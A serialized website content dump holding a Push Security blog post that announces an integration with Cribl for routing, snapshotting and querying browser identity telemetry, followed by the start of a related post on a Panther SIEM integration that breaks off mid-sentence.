13115],{"data":113116,"marks":113117,"value":18415,"nodeType":173},{},[],{"data":113119,"content":113120,"nodeType":250},{},[113121,113130,113139,113148,113157,113166,113175],{"data":113122,"content":113123,"nodeType":254},{},[113124],{"data":113125,"content":113126,"nodeType":178},{},[113127],{"data":113128,"marks":113129,"value":65631,"nodeType":173},{},[],{"data":113131,"content":113132,"nodeType":254},{},[113133],{"data":113134,"content":113135,"nodeType":178},{},[113136],{"data":113137,"marks":113138,"value":65641,"nodeType":173},{},[],{"data":113140,"content":113141,"nodeType":254},{},[113142],{"data":113143,"content":113144,"nodeType":178},{},[113145],{"data":113146,"marks":113147,"value":65651,"nodeType":173},{},[],{"data":113149,"content":113150,"nodeType":254},{},[113151],{"data":113152,"content":113153,"nodeType":178},{},[113154],{"data":113155,"marks":113156,"value":65661,"nodeType":173},{},[],{"data":113158,"content":113159,"nodeType":254},{},[113160],{"data":113161,"content":113162,"nodeType":178},{},[113163],{"data":113164,"marks":113165,"value":65671,"nodeType":173},{},[],{"data":113167,"content":113168,"nodeType":254},{},[113169],{"data":113170,"content":113171,"nodeType":178},{},[113172],{"data":113173,"marks":113174,"value":65681,"nodeType":173},{},[],{"data":113176,"content":113177,"nodeType":254},{},[113178],{"data":113179,"content":113180,"nodeType":178},{},[113181],{"data":113182,"marks":113183,"value":65691,"nodeType":173},{},[],{"data":113185,"content":113186,"nodeType":169},{},[113187],{"data":113188,"marks":113189,"value":65631,"nodeType":173},{},[],{"data":113191,"content":113192,"nodeType":178},{},[113193,113196,113200],{"data":113194,"marks":113195,"value":65704,"nodeType":173},{},[],{"data":113197,"marks":113198,"value":65709,"nodeType":173},{},[113199],{"type":370},{"data":113201,"marks":113202,"value":65713,"nodeType":173},{},[],{"data":113204,"content":113205,"nodeType":178},{},[113206],{"data":113207,"marks":113208,"value":65720,"nodeType":173},{},[],{"data":113210,"content":113213,"nodeType":312},{"target":113211},{"sys":113212},{"id":65725,"type":317,"linkType":318},[],{"data":113215,"content":113216,"nodeType":178},{},[113217,113220,113228],{"data":113218,"marks":113219,"value":37,"nodeType":173},{},[],{"data":113221,"content":113224,"nodeType":1698},{"target":113222},{"sys":113223},{"id":65737,"type":317,"linkType":318},[113225],{"data":113226,"marks":113227,"value":18605,"nodeType":173},{},[],{"data":113229,"marks":113230,"value":37,"nodeType":173},{},[],{"data":113232,"content":113233,"nodeType":169},{},[113234],{"data":113235,"marks":113236,"value":65641,"nodeType":173},{},[],{"data":113238,"content":113239,"nodeType":178},{},[113240,113243,113247],{"data":113241,"marks":113242,"value":65757,"nodeType":173},{},[],{"data":113244,"marks":113245,"value":65762,"nodeType":173},{},[113246],{"type":370},{"data":113248,"marks":113249,"value":65766,"nodeType":173},{},[],{"data":113251,"content":113252,"nodeType":178},{},[113253],{"data":113254,"marks":113255,"value":65773,"nodeType":173},{},[],{"data":113257,"content":113258,"nodeType":178},{},[113259],{"data":113260,"marks":113261,"value":65780,"nodeType":173},{},[],{"data":113263,"content":113264,"nodeType":178},{},[113265,113268,113272,113275,113279],{"data":113266,"marks":113267,"value":65787,"nodeType":173},{},[],{"data":113269,"marks":113270,"value":2789,"nodeType":173},{},[113271],{"type":370},{"data":113273,"marks":113274,"value":65795,"nodeType":173},{},[],{"data":113276,"marks":113277,"value":65800,"nodeType":173},{},[113278],{"type":370},{"data":113280,"marks":113281,"value":65804,"nodeType":173},{},[],{"data":113283,"content":113286,"nodeType":312},{"target":113284},{"sys":113285},{"id":25101,"type":317,"linkType":318},[],{"data":113288,"content":113289,"nodeType":169},{},[113290],{"data":113291,"marks":113292,"value":65651,"nodeType":173},{},[],{"data":113294,"content":113295,"nodeType":178},{},[113296,113299,113303],{"data":113297,"marks":113298,"value":65822,"nodeType":173},{},[],{"data":113300,"marks":113301,"value":2578,"nodeType":173},{},[113302],{"type":370},{"data":113304,"marks":113305,"value":2340,"nodeType":173},{},[],{"data":113307,"content":113308,"nodeType":178},{},[113309],{"data":113310,"marks":113311,"value":65836,"nodeType":173},{},[],{"data":113313,"content":113316,"nodeType":312},{"target":113314},{"sys":113315},{"id":65841,"type":317,"linkType":318},[],{"data":113318,"content":113319,"nodeType":178},{},[113320,113323,113331],{"data":113321,"marks":113322,"value":37,"nodeType":173},{},[],{"data":113324,"content":113327,"nodeType":1698},{"target":113325},{"sys":113326},{"id":2442,"type":317,"linkType":318},[113328],{"data":113329,"marks":113330,"value":18605,"nodeType":173},{},[],{"data":113332,"marks":113333,"value":37,"nodeType":173},{},[],{"data":113335,"content":113336,"nodeType":169},{},[113337],{"data":113338,"marks":113339,"value":65661,"nodeType":173},{},[],{"data":113341,"content":113342,"nodeType":178},{},[113343,113346,113350],{"data":113344,"marks":113345,"value":65872,"nodeType":173},{},[],{"data":113347,"marks":113348,"value":65877,"nodeType":173},{},[113349],{"type":370},{"data":113351,"marks":113352,"value":65881,"nodeType":173},{},[],{"data":113354,"content":113355,"nodeType":178},{},[113356],{"data":113357,"marks":113358,"value":65888,"nodeType":173},{},[],{"data":113360,"content":113361,"nodeType":178},{},[113362],{"data":113363,"marks":113364,"value":65895,"nodeType":173},{},[],{"data":113366,"content":113369,"nodeType":312},{"target":113367},{"sys":113368},{"id":65900,"type":317,"linkType":318},[],{"data":113371,"content":113372,"nodeType":178},{},[113373,113376,113384],{"data":113374,"marks":113375,"value":37,"nodeType":173},{},[],{"data":113377,"content":113380,"nodeType":1698},{"target":113378},{"sys":113379},{"id":65912,"type":317,"linkType":318},[113381],{"data":113382,"marks":113383,"value":18605,"nodeType":173},{},[],{"data":113385,"marks":113386,"value":37,"nodeType":173},{},[],{"data":113388,"content":113389,"nodeType":169},{},[113390],{"data":113391,"marks":113392,"value":65671,"nodeType":173},{},[],{"data":113394,"content":113395,"nodeType":178},{},[113396,113399,113403],{"data":113397,"marks":113398,"value":65284,"nodeType":173},{},[],{"data":113400,"marks":113401,"value":65936,"nodeType":173},{},[113402],{"type":370},{"data":113404,"marks":113405,"value":65940,"nodeType":173},{},[],{"data":113407,"content":113408,"nodeType":178},{},[113409],{"data":113410,"marks":113411,"value":65947,"nodeType":173},{},[],{"data":113413,"content":113416,"nodeType":312},{"target":113414},{"sys":113415},{"id":65952,"type":317,"linkType":318},[],{"data":113418,"content":113419,"nodeType":178},{},[113420,113423,113429],{"data":113421,"marks":113422,"value":37,"nodeType":173},{},[],{"data":113424,"content":113425,"nodeType":186},{"uri":65962},[113426],{"data":113427,"marks":113428,"value":18605,"nodeType":173},{},[],{"data":113430,"marks":113431,"value":37,"nodeType":173},{},[],{"data":113433,"content":113434,"nodeType":169},{},[113435],{"data":113436,"marks":113437,"value":65681,"nodeType":173},{},[],{"data":113439,"content":113440,"nodeType":178},{},[113441,113444,113448,113451,113455,113458,113462],{"data":113442,"marks":113443,"value":65982,"nodeType":173},{},[],{"data":113445,"marks":113446,"value":65987,"nodeType":173},{},[113447],{"type":370},{"data":113449,"marks":113450,"value":65991,"nodeType":173},{},[],{"data":113452,"marks":113453,"value":65996,"nodeType":173},{},[113454],{"type":370},{"data":113456,"marks":113457,"value":933,"nodeType":173},{},[],{"data":113459,"marks":113460,"value":2570,"nodeType":173},{},[113461],{"type":370},{"data":113463,"marks":113464,"value":2340,"nodeType":173},{},[],{"data":113466,"content":113467,"nodeType":178},{},[113468,113471,113475],{"data":113469,"marks":113470,"value":66013,"nodeType":173},{},[],{"data":113472,"marks":113473,"value":19371,"nodeType":173},{},[113474],{"type":370},{"data":113476,"marks":113477,"value":66021,"nodeType":173},{},[],{"data":113479,"content":113482,"nodeType":312},{"target":113480},{"sys":113481},{"id":66026,"type":317,"linkType":318},[],{"data":113484,"content":113485,"nodeType":178},{},[113486,113489,113495],{"data":113487,"marks":113488,"value":37,"nodeType":173},{},[],{"data":113490,"content":113491,"nodeType":186},{"uri":66036},[113492],{"data":113493,"marks":113494,"value":18605,"nodeType":173},{},[],{"data":113496,"marks":113497,"value":37,"nodeType":173},{},[],{"data":113499,"content":113500,"nodeType":169},{},[113501],{"data":113502,"marks":113503,"value":65691,"nodeType":173},{},[],{"data":113505,"content":113506,"nodeType":178},{},[113507,113510,113514],{"data":113508,"marks":113509,"value":66056,"nodeType":173},{},[],{"data":113511,"marks":113512,"value":65573,"nodeType":173},{},[113513],{"type":370},{"data":113515,"marks":113516,"value":66064,"nodeType":173},{},[],{"data":113518,"content":113521,"nodeType":312},{"target":113519},{"sys":113520},{"id":66069,"type":317,"linkType":318},[],{"data":113523,"content":113524,"nodeType":178},{},[113525],{"data":113526,"marks":113527,"value":37,"nodeType":173},{},[],{"entries":113529},{"inline":113530,"hyperlink":113531,"block":113543},[],[113532,113536,113538],{"sys":113533,"__typename":66743,"linkedFromParent":118,"title":113534,"slug":113535,"audience":66746},{"id":65737},"Administering Push","administering-push",{"sys":113537,"__typename":6655,"title":6686,"slug":6687,"articleId":6688},{"id":2442},{"sys":113539,"__typename":6655,"title":113540,"slug":113541,"articleId":113542},{"id":65912},"What happens when I merge employee records?","what-happens-when-i-merge-employee-records",10127,[113544,113551,113554,113560,113567,113574,113581],{"sys":113545,"__typename":5345,"title":113546,"caption":118,"layoutMode":118,"file":113547},{"id":65725},"Detections page overview - docs - Administering Push",{"url":113548,"width":113549,"height":113550},"https://images.ctfassets.net/y1cdw1ablpvd/2FcQEiNpkohhhv631S3QK/bf8a9d96cf6c4db9193c7e1c07cb31dd/detections_page_20250505.png",3014,1714,{"sys":113552,"__typename":5345,"title":46410,"caption":118,"layoutMode":118,"file":113553},{"id":25101},{"url":46412,"width":46413,"height":46414},{"sys":113555,"__typename":5345,"title":113556,"caption":118,"layoutMode":118,"file":113557},{"id":65841},"Password enforcement banner - KB 10129",{"url":113558,"width":23880,"height":113559},"https://images.ctfassets.net/y1cdw1ablpvd/3UDPMdxBrIOj6Uw3iDJxEF/bf3233e24a93e7bca9138bdb21a7ecc5/password_enforcement_banner.png",809,{"sys":113561,"__typename":5345,"title":113562,"caption":118,"layoutMode":118,"file":113563},{"id":65900},"Merge employees - select primary - KB 10127",{"url":113564,"width":113565,"height":113566},"https://images.ctfassets.net/y1cdw1ablpvd/6UnGOsbhaHaORo0ltzEWiv/6e37edf71db832d6c61671cfbdb8afeb/merge_employees_primary_20250402.png",539,346,{"sys":113568,"__typename":5345,"title":113569,"caption":118,"layoutMode":118,"file":113570},{"id":65952},"Webhook event selection config screen - for June 2025 release notes",{"url":113571,"width":113572,"height":113573},"https://images.ctfassets.net/y1cdw1ablpvd/3IfutfvORDc67NnRcPE6Jk/4544e0c12224fddde9ae734564c5faac/webhook_select_events_20250528.png",1396,1708,{"sys":113575,"__typename":5345,"title":113576,"caption":118,"layoutMode":118,"file":113577},{"id":66026},"Phishing tool detection config rule slideout - for June 2025 release notes",{"url":113578,"width":113579,"height":113580},"https://images.ctfassets.net/y1cdw1ablpvd/1lSBIFFHjN7wJmoZIsTPwS/83e30221f36160b52c1f29720d03f012/config_rule_example_20250528.png",1468,1704,{"sys":113582,"__typename":5345,"title":113583,"caption":118,"layoutMode":118,"file":113584},{"id":66069},"Microsoft Sentinel tile on Settings - for release notes",{"url":113585,"width":113586,"height":113587},"https://images.ctfassets.net/y1cdw1ablpvd/2r29uCFauPYNnz2Jbs75Kc/4e180eea6c79ecc253919a651a63851a/sentinel_integration_tile_20250528.png",2498,1364,"content:blog:product-release-june-2025.json","blog/product-release-june-2025.json","blog/product-release-june-2025",{"_path":113592,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":113593,"ogImage":118,"summary":113596,"title":113607,"subtitle":118,"metaTitle":113608,"synopsis":113609,"hashTags":118,"publishedDate":113610,"slug":113611,"tagsCollection":113612,"content":113616,"relatedBlogPostsCollection":114085,"authorsCollection":114497,"_id":114501,"_type":5439,"_source":5440,"_file":114502,"_stem":114503,"_extension":5439},"/blog/better-together-identity-telemetry-from-push-smart-storage-and-searches-from",{"id":113594,"publishedAt":113595},"1sQvkmXRQaFGRpuE01KeF1","2025-06-03T14:22:38.727Z",{"json":113597},{"data":113598,"content":113599,"nodeType":165},{},[113600],{"data":113601,"content":113602,"nodeType":178},{},[113603],{"data":113604,"marks":113605,"value":113606,"nodeType":173},{},[],"We’re thrilled to announce our partnership with Cribl to make it much easier to snapshot, transform, and query Push telemetry using Cribl’s data management solutions.\n","Better together: Identity telemetry from Push + smart storage and searches from Cribl","Integrate Cribl and Push Security","We’re thrilled to announce our partnership with Cribl to make it much easier to snapshot, transform, and query Push telemetry.","2025-06-03T00:00:00.000Z","better-together-identity-telemetry-from-push-smart-storage-and-searches-from",{"items":113613},[113614],{"sys":113615,"name":505},{"id":504},{"json":113617,"links":114074},{"data":113618,"content":113619,"nodeType":165},{},[113620,113627,113670,113677,113684,113718,113725,113732,113785,113792,113799,113806,113813,113820,113827,113834,113841,113848,113881,113888,113906,113913,113920,113927,113960,113967,113984,113991,113998,114028,114057],{"data":113621,"content":113622,"nodeType":178},{},[113623],{"data":113624,"marks":113625,"value":113626,"nodeType":173},{},[],"In the midst of an identity security investigation when every minute counts, there are few sentences more painful to say than:",{"data":113628,"content":113629,"nodeType":250},{},[113630,113640,113650,113660],{"data":113631,"content":113632,"nodeType":254},{},[113633],{"data":113634,"content":113635,"nodeType":178},{},[113636],{"data":113637,"marks":113638,"value":113639,"nodeType":173},{},[],"“We didn’t snapshot that data, so we didn’t have the right time period.”",{"data":113641,"content":113642,"nodeType":254},{},[113643],{"data":113644,"content":113645,"nodeType":178},{},[113646],{"data":113647,"marks":113648,"value":113649,"nodeType":173},{},[],"“We didn’t send those logs to the SIEM, so we couldn’t do the correlation we needed to rule out [bad thing].”",{"data":113651,"content":113652,"nodeType":254},{},[113653],{"data":113654,"content":113655,"nodeType":178},{},[113656],{"data":113657,"marks":113658,"value":113659,"nodeType":173},{},[],"“We didn’t have any user behavior telemetry in the browser, so we didn’t know if they entered their password on the phishing page or not.”",{"data":113661,"content":113662,"nodeType":254},{},[113663],{"data":113664,"content":113665,"nodeType":178},{},[113666],{"data":113667,"marks":113668,"value":113669,"nodeType":173},{},[],"“We had no way of determining what other accounts they were using that compromised password on.”",{"data":113671,"content":113672,"nodeType":178},{},[113673],{"data":113674,"marks":113675,"value":113676,"nodeType":173},{},[],"Security teams use Push and Cribl so they never have to utter those words. So we’re especially thrilled to announce our partnership with Cribl to make it much easier to snapshot, transform, and query Push telemetry using Cribl’s data management solutions.",{"data":113678,"content":113679,"nodeType":178},{},[113680],{"data":113681,"marks":113682,"value":113683,"nodeType":173},{},[],"Push uses a browser agent deployed across all your workforce browsers to do real-time detection and response for identity-based attacks like credential phishing, account takeover, and session token theft. ",{"data":113685,"content":113686,"nodeType":178},{},[113687,113691,113701,113705,113714],{"data":113688,"marks":113689,"value":113690,"nodeType":173},{},[],"As the Push browser agent learns your environment, it also automatically inventories all the apps that your employees log in to, their authentication methods and MFA usage, and the security posture of their accounts. We call this an organization’s ",{"data":113692,"content":113696,"nodeType":1698},{"target":113693},{"sys":113694},{"id":113695,"type":317,"linkType":318},"1pJdOGN0dOd3BKVqO4CxHh",[113697],{"data":113698,"marks":113699,"value":113700,"nodeType":173},{},[],"identity attack surface",{"data":113702,"marks":113703,"value":113704,"nodeType":173},{},[]," because it represents the risks posed by insecure accounts and apps — even the ones you didn’t know about — that are ",{"data":113706,"content":113709,"nodeType":1698},{"target":113707},{"sys":113708},{"id":25066,"type":317,"linkType":318},[113710],{"data":113711,"marks":113712,"value":113713,"nodeType":173},{},[],"increasingly targeted",{"data":113715,"marks":113716,"value":113717,"nodeType":173},{},[]," by attackers.",{"data":113719,"content":113720,"nodeType":178},{},[113721],{"data":113722,"marks":113723,"value":113724,"nodeType":173},{},[],"From this unique vantage point in the browser, Push can block identity attacks like credential phishing while also generating telemetry that security teams rely on for knowing what happened during an incident, such as what the user saw and did, and how big the blast radius is in terms of other compromised accounts.",{"data":113726,"content":113727,"nodeType":178},{},[113728],{"data":113729,"marks":113730,"value":113731,"nodeType":173},{},[],"By integrating with Cribl, Push customers can now:",{"data":113733,"content":113734,"nodeType":250},{},[113735,113745,113755,113765,113775],{"data":113736,"content":113737,"nodeType":254},{},[113738],{"data":113739,"content":113740,"nodeType":178},{},[113741],{"data":113742,"marks":113743,"value":113744,"nodeType":173},{},[],"Quickly ingest and transform Push data into Cribl in order to route it to their SIEM, SOAR, or other third-party system — without overwhelming their pipeline or running up costs on log volume.",{"data":113746,"content":113747,"nodeType":254},{},[113748],{"data":113749,"content":113750,"nodeType":178},{},[113751],{"data":113752,"marks":113753,"value":113754,"nodeType":173},{},[],"Get immediate insights into identity security threats and posture across their environment by using Cribl’s out-of-the-box dashboards for Push telemetry.",{"data":113756,"content":113757,"nodeType":254},{},[113758],{"data":113759,"content":113760,"nodeType":178},{},[113761],{"data":113762,"marks":113763,"value":113764,"nodeType":173},{},[],"Easily create a snapshot of Push data to allow for historical comparisons and queries.",{"data":113766,"content":113767,"nodeType":254},{},[113768],{"data":113769,"content":113770,"nodeType":178},{},[113771],{"data":113772,"marks":113773,"value":113774,"nodeType":173},{},[],"Correlate Push data with other log sources such as their EDR and identity provider to get a fuller picture of identity security risks and incidents. ",{"data":113776,"content":113777,"nodeType":254},{},[113778],{"data":113779,"content":113780,"nodeType":178},{},[113781],{"data":113782,"marks":113783,"value":113784,"nodeType":173},{},[],"Hunt across their data for risky user behaviors like suspicious login methods, signs of credential phishing or stolen sessions, and credential reuse.",{"data":113786,"content":113787,"nodeType":178},{},[113788],{"data":113789,"marks":113790,"value":113791,"nodeType":173},{},[],"Here’s a closer look at what we built together and how you can use it.",{"data":113793,"content":113794,"nodeType":169},{},[113795],{"data":113796,"marks":113797,"value":113798,"nodeType":173},{},[],"Tooling built by the teams that actually use it",{"data":113800,"content":113801,"nodeType":178},{},[113802],{"data":113803,"marks":113804,"value":113805,"nodeType":173},{},[],"The truth is, we selfishly had the idea to build this integration because we use Cribl at Push — and they use Push at Cribl. ",{"data":113807,"content":113808,"nodeType":178},{},[113809],{"data":113810,"marks":113811,"value":113812,"nodeType":173},{},[],"As mutual users (and fans!) of each other’s products, our security teams had firsthand experience with the use cases, data, and possibilities that combining our capabilities presented.",{"data":113814,"content":113815,"nodeType":178},{},[113816],{"data":113817,"marks":113818,"value":113819,"nodeType":173},{},[],"“Our team had been using Push for a while, and I was already a big fan of their approach,” explains Alex Crusco, staff security engineer at Cribl. “So when we decided to build out-of-the-box security packs in Cribl, they were the first partner that came to mind. Identity is a top attack vector, and defending it isn’t easy. The combined power of Cribl and Push gives security teams the clarity and control to turn identity from a blind spot into a defensible asset.”",{"data":113821,"content":113822,"nodeType":178},{},[113823],{"data":113824,"marks":113825,"value":113826,"nodeType":173},{},[],"So here’s what we built:",{"data":113828,"content":113829,"nodeType":235},{},[113830],{"data":113831,"marks":113832,"value":113833,"nodeType":173},{},[],"Cribl Stream pack for Push",{"data":113835,"content":113836,"nodeType":178},{},[113837],{"data":113838,"marks":113839,"value":113840,"nodeType":173},{},[],"Using the Cribl Stream pack for Push, you get a preconfigured parser for individual Push events that automatically cleans and formats them for your exact use case so you can query the data directly in Cribl or route it somewhere else. ",{"data":113842,"content":113843,"nodeType":178},{},[113844],{"data":113845,"marks":113846,"value":113847,"nodeType":173},{},[],"By sending Push data to Cribl, you can enable your security team to:",{"data":113849,"content":113850,"nodeType":250},{},[113851,113861,113871],{"data":113852,"content":113853,"nodeType":254},{},[113854],{"data":113855,"content":113856,"nodeType":178},{},[113857],{"data":113858,"marks":113859,"value":113860,"nodeType":173},{},[],"Ingest and normalize telemetry on the employees, accounts, browsers, security findings, and detections observed by Push across your environment.",{"data":113862,"content":113863,"nodeType":254},{},[113864],{"data":113865,"content":113866,"nodeType":178},{},[113867],{"data":113868,"marks":113869,"value":113870,"nodeType":173},{},[],"Route specific alerts and events to your SIEM or other tool.",{"data":113872,"content":113873,"nodeType":254},{},[113874],{"data":113875,"content":113876,"nodeType":178},{},[113877],{"data":113878,"marks":113879,"value":113880,"nodeType":173},{},[],"Enrich Push data with other sources to expand the context for understanding events, or look for wider patterns.",{"data":113882,"content":113883,"nodeType":178},{},[113884],{"data":113885,"marks":113886,"value":113887,"nodeType":173},{},[],"Push logs are pretty lightweight out of the box, but the Stream pack streamlines them further. By transforming or dropping some of the event fields (such as event headers), you can reduce your event size by 50%. This gives security teams the opportunity and flexibility to save on costs when sending events to systems that charge by log volume while also getting the data that security teams need where they need it.",{"data":113889,"content":113890,"nodeType":178},{},[113891,113895,113903],{"data":113892,"marks":113893,"value":113894,"nodeType":173},{},[],"You can get the Cribl Stream pack for Push via the ",{"data":113896,"content":113898,"nodeType":186},{"uri":113897},"https://packs.cribl.io/packs/cc-push-security",[113899],{"data":113900,"marks":113901,"value":113902,"nodeType":173},{},[],"Cribl Dispensary",{"data":113904,"marks":113905,"value":2340,"nodeType":173},{},[],{"data":113907,"content":113908,"nodeType":235},{},[113909],{"data":113910,"marks":113911,"value":113912,"nodeType":173},{},[],"Cribl Search pack for Push",{"data":113914,"content":113915,"nodeType":178},{},[113916],{"data":113917,"marks":113918,"value":113919,"nodeType":173},{},[],"The other half of the equation is the Cribl Search pack for Push. Once you’ve got your Push data into Cribl, you can use it to populate pre-built dashboards provided by the Search pack.",{"data":113921,"content":113922,"nodeType":178},{},[113923],{"data":113924,"marks":113925,"value":113926,"nodeType":173},{},[],"Using the Cribl Search pack dashboards, you can:",{"data":113928,"content":113929,"nodeType":250},{},[113930,113940,113950],{"data":113931,"content":113932,"nodeType":254},{},[113933],{"data":113934,"content":113935,"nodeType":178},{},[113936],{"data":113937,"marks":113938,"value":113939,"nodeType":173},{},[],"Monitor the state of your Push Security deployment and identify any gaps in browser extension coverage.",{"data":113941,"content":113942,"nodeType":254},{},[113943],{"data":113944,"content":113945,"nodeType":178},{},[113946],{"data":113947,"marks":113948,"value":113949,"nodeType":173},{},[],"Get a snapshot of security issues such as suspicious or unapproved login methods (e.g. local password logins on SSO apps); credential reuse; or signs of adversary-in-the-middle phishing incidents or stolen sessions.",{"data":113951,"content":113952,"nodeType":254},{},[113953],{"data":113954,"content":113955,"nodeType":178},{},[113956],{"data":113957,"marks":113958,"value":113959,"nodeType":173},{},[],"Deep dive into behavior data for a specific employee, to assist threat hunters and analysts with investigations or incident response.",{"data":113961,"content":113962,"nodeType":178},{},[113963],{"data":113964,"marks":113965,"value":113966,"nodeType":173},{},[],"With the Search pack, you can also take a daily snapshot of your Push data to see trends across time when searching, or to conduct historical investigations.",{"data":113968,"content":113969,"nodeType":178},{},[113970,113974,113981],{"data":113971,"marks":113972,"value":113973,"nodeType":173},{},[],"You can get the Cribl Search pack for Push via the ",{"data":113975,"content":113977,"nodeType":186},{"uri":113976},"https://packs.cribl.io/packs/cc-search-push-security",[113978],{"data":113979,"marks":113980,"value":113902,"nodeType":173},{},[],{"data":113982,"marks":113983,"value":2340,"nodeType":173},{},[],{"data":113985,"content":113986,"nodeType":169},{},[113987],{"data":113988,"marks":113989,"value":113990,"nodeType":173},{},[],"Get started",{"data":113992,"content":113993,"nodeType":178},{},[113994],{"data":113995,"marks":113996,"value":113997,"nodeType":173},{},[],"To get started, you’ll need to be using both Cribl and Push. ",{"data":113999,"content":114000,"nodeType":178},{},[114001,114005,114013,114017,114024],{"data":114002,"marks":114003,"value":114004,"nodeType":173},{},[],"To get started using the Stream pack, you’ll need to configure a Stream source to receive data over HTTPS, then create a ",{"data":114006,"content":114008,"nodeType":186},{"uri":114007},"https://pushsecurity.redoc.ly/webhooks-v1/",[114009],{"data":114010,"marks":114011,"value":114012,"nodeType":173},{},[],"webhook",{"data":114014,"marks":114015,"value":114016,"nodeType":173},{},[]," in the Push admin console that points to your Cribl Stream source and download and install the Cribl Stream pack for Push. Follow the instructions in the ",{"data":114018,"content":114019,"nodeType":186},{"uri":113897},[114020],{"data":114021,"marks":114022,"value":114023,"nodeType":173},{},[],"Stream pack description",{"data":114025,"marks":114026,"value":114027,"nodeType":173},{},[]," for guidance.",{"data":114029,"content":114030,"nodeType":178},{},[114031,114035,114043,114047,114054],{"data":114032,"marks":114033,"value":114034,"nodeType":173},{},[],"To get started using the Search pack, you’ll need to also set up the ",{"data":114036,"content":114038,"nodeType":186},{"uri":114037},"https://github.com/criblio/collector-templates/tree/main/collectors/rest/pushsecurity",[114039],{"data":114040,"marks":114041,"value":114042,"nodeType":173},{},[],"Push REST collectors",{"data":114044,"marks":114045,"value":114046,"nodeType":173},{},[]," in Cribl Stream to ingest your Push data. Then import the Search pack into your Cribl instance. Follow the instructions in the ",{"data":114048,"content":114049,"nodeType":186},{"uri":113976},[114050],{"data":114051,"marks":114052,"value":114053,"nodeType":173},{},[],"Search pack description",{"data":114055,"marks":114056,"value":114027,"nodeType":173},{},[],{"data":114058,"content":114059,"nodeType":178},{},[114060,114064,114070],{"data":114061,"marks":114062,"value":114063,"nodeType":173},{},[],"Not yet a user of Push yet, but want to learn more about how our data enables detection, response, and security investigations? ",{"data":114065,"content":114066,"nodeType":186},{"uri":2886},[114067],{"data":114068,"marks":114069,"value":93499,"nodeType":173},{},[],{"data":114071,"marks":114072,"value":114073,"nodeType":173},{},[]," with our team to chat.",{"entries":114075},{"block":114076,"inline":114077,"hyperlink":114078},[],[],[114079,114083],{"sys":114080,"__typename":1528,"title":114081,"slug":114082},{"id":113695},"Looking back on identity-based breaches in 2024","2024-identity-breaches",{"sys":114084,"__typename":1528,"title":46334,"slug":46335},{"id":25066},{"items":114086},[114087],{"__typename":1528,"sys":114088,"content":114090,"title":114483,"synopsis":114484,"hashTags":118,"publishedDate":114485,"slug":114486,"tagsCollection":114487,"authorsCollection":114493},{"id":114089},"7qYHyqnkvqQRbYn3nTi5br",{"json":114091},{"nodeType":165,"data":114092,"content":114093},{},[114094,114101,114108,114156,114163,114170,114177,114183,114202,114209,114231,114238,114245,114267,114273,114310,114317,114324,114330,114337,114344,114351,114358,114365,114442,114448,114466],{"nodeType":178,"data":114095,"content":114096},{},[114097],{"nodeType":173,"value":114098,"marks":114099,"data":114100},"While Push’s official mission is to stop identity attacks, our unofficial motto might be described as “don’t make security teams log into another tool if they don’t have to.”",[],{},{"nodeType":178,"data":114102,"content":114103},{},[114104],{"nodeType":173,"value":114105,"marks":114106,"data":114107},"To that end, we’re thrilled to announce a new integration with Panther that makes it possible in a few clicks to:",[],{},{"nodeType":250,"data":114109,"content":114110},{},[114111,114126,114141],{"nodeType":254,"data":114112,"content":114113},{},[114114],{"nodeType":178,"data":114115,"content":114116},{},[114117,114122],{"nodeType":173,"value":114118,"marks":114119,"data":114121},"Ingest Push logs",[114120],{"type":370},{},{"nodeType":173,"value":114123,"marks":114124,"data":114125}," into your Panther SIEM.",[],{},{"nodeType":254,"data":114127,"content":114128},{},[114129],{"nodeType":178,"data":114130,"content":114131},{},[114132,114137],{"nodeType":173,"value":114133,"marks":114134,"data":114136},"Use preconfigured data schemas",[114135],{"type":370},{},{"nodeType":173,"value":114138,"marks":114139,"data":114140}," for these logs without having to create your own.",[],{},{"nodeType":254,"data":114142,"content":114143},{},[114144],{"nodeType":178,"data":114145,"content":114146},{},[114147,114152],{"nodeType":173,"value":114148,"marks":114149,"data":114151},"Enable ready-made detections",[114150],{"type":370},{},{"nodeType":173,"value":114153,"marks":114154,"data":114155}," for Push webhook events, including session token theft and adversary-in-the-middle (AitM) phishing toolkits.",[],{},{"nodeType":178,"data":114157,"content":114158},{},[114159],{"nodeType":173,"value":114160,"marks":114161,"data":114162},"The combination of Push’s unique telemetry, powered by the Push browser agent, and Panther’s correlation and log normalization capabilities was a perfect match, explains Panther’s Head of Partnerships, Andrew Dooley.",[],{},{"nodeType":178,"data":114164,"content":114165},{},[114166],{"nodeType":173,"value":114167,"marks":114168,"data":114169},"“As a SIEM, we’re looking for where we can find the most impactful security information in our customers’ environments to bring into Panther,” Dooley says. ",[],{},{"nodeType":178,"data":114171,"content":114172},{},[114173],{"nodeType":173,"value":114174,"marks":114175,"data":114176},"“With identity-based attacks being so common and impactful, identity telemetry data directly from users' browsers is exactly the kind of high-impact logs we want to support our customers’ threat detection and investigation workflows.”",[],{},{"nodeType":312,"data":114178,"content":114182},{"target":114179},{"sys":114180},{"id":114181,"type":317,"linkType":318},"77bCOg5nPKjyKdhH77dUox",[],{"nodeType":178,"data":114184,"content":114185},{},[114186,114190,114198],{"nodeType":173,"value":114187,"marks":114188,"data":114189},"In this article, we’ll highlight some of the use cases you can achieve with the Push-Panther integration. Or, if you prefer, you can ",[],{},{"nodeType":186,"data":114191,"content":114193},{"uri":114192},"https://docs.panther.com/data-onboarding/supported-logs/push-security",[114194],{"nodeType":173,"value":114195,"marks":114196,"data":114197},"dive into the docs",[],{},{"nodeType":173,"value":114199,"marks":114200,"data":114201}," right away.",[],{},{"nodeType":169,"data":114203,"content":114204},{},[114205],{"nodeType":173,"value":114206,"marks":114207,"data":114208},"How to detect session token theft with Push and Panther",[],{},{"nodeType":178,"data":114210,"content":114211},{},[114212,114216,114227],{"nodeType":173,"value":114213,"marks":114214,"data":114215},"A key use case we set out to solve with the Push-Panther integration is detecting ",[],{},{"nodeType":1698,"data":114217,"content":114221},{"target":114218},{"sys":114219},{"id":114220,"type":317,"linkType":318},"6Uvqu6LcWzOVfA9mxtu841",[114222],{"nodeType":173,"value":114223,"marks":114224,"data":114226},"session token theft",[114225],{"type":370},{},{"nodeType":173,"value":114228,"marks":114229,"data":114230},", a session hijacking technique where endpoint malware such as an infostealer is used to extract sessions and other valuable data from a device.",[],{},{"nodeType":178,"data":114232,"content":114233},{},[114234],{"nodeType":173,"value":114235,"marks":114236,"data":114237},"Using stolen tokens, attackers don’t even need to bypass MFA; they can just log in by importing the session cookie into their browser.",[],{},{"nodeType":178,"data":114239,"content":114240},{},[114241],{"nodeType":173,"value":114242,"marks":114243,"data":114244},"In the 